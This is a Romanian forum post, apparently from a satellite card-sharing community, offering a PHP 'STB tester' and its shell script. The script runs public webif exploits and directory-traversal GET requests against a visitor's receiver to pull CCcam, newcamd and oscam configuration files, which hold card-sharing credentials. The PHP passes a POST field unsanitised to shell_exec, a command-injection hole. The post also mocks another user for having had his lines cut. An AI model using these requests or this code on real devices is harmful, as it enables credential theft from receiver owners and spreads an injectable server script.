ce crezi ca se vede in sursa?
are un shell_exec..la un script..
Code:
<?php
echo '
<html>
<body>
<br>BEBELUSUL webif tester beta1 using 5 public webif e x p l o i t s!!!.
<form action="'.htmlentities($_SERVER['PHP_SELF']).'" method="post">
Test your STB: <input type="hidden" name="aaa" value='.$_SERVER['REMOTE_ADDR'].' readonly>
<input type="submit">
</form>
</body>';
if (isset($_POST["aaa"]) && !empty($_POST["aaa"])) {
$host = $_POST['aaa'];
$cmd= "/x/mar/UTILS/webz $host";
$output = shell_exec($cmd);
echo "<pre>$output</pre>";
}
?>
Code:
echo "###################### $1 #####################"
/x/mar/UTILS/web1 $1 /var/etc/CCcam.cfg
/x/mar/UTILS/web1 $1 /var/keys/newcamd.list
/x/mar/UTILS/web1 $1 /var/tuxbox/config/oscam.server
/x/mar/UTILS/web1 $1 /var/tuxbox/config/oscam.conf
/x/mar/UTILS/web1 $1 /var/tuxbox/config/newcamd.conf
/x/mar/UTILS/web2 $1 /var/etc/CCcam.cfg
/x/mar/UTILS/web2 $1 /var/keys/newcamd.list
/x/mar/UTILS/web2 $1 /var/tuxbox/config/oscam.server
/x/mar/UTILS/web2 $1 /var/tuxbox/config/oscam.conf
/x/mar/UTILS/web2 $1 /var/tuxbox/config/newcamd.conf
GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Fetc%2FCCcam.cfg
GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Fkeys%2Fnewcamd.list
GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Ftuxbox%2Fconfig%2Foscam.server
GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Ftuxbox%2Fconfig%2Foscam.conf
GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Fkeys%2Fnewcamd.conf
GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Ftuxbox%2Fconfig%2Foscam.server
GET http://$1/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Ftuxbox%2Fconfig%2Foscam.conf
/x/mar/UTILS/web3 $1
web1 web2 web3 sunt exploituri pt webif(le gasiti pe google)
DJ-HU stiu ca crapa pipota in tine de cand ti-am taiat liniile ...dar asta e..testeaza-ti tu cutia la calorifer sau cu un ciocan!
Se poate sterge thread-ul!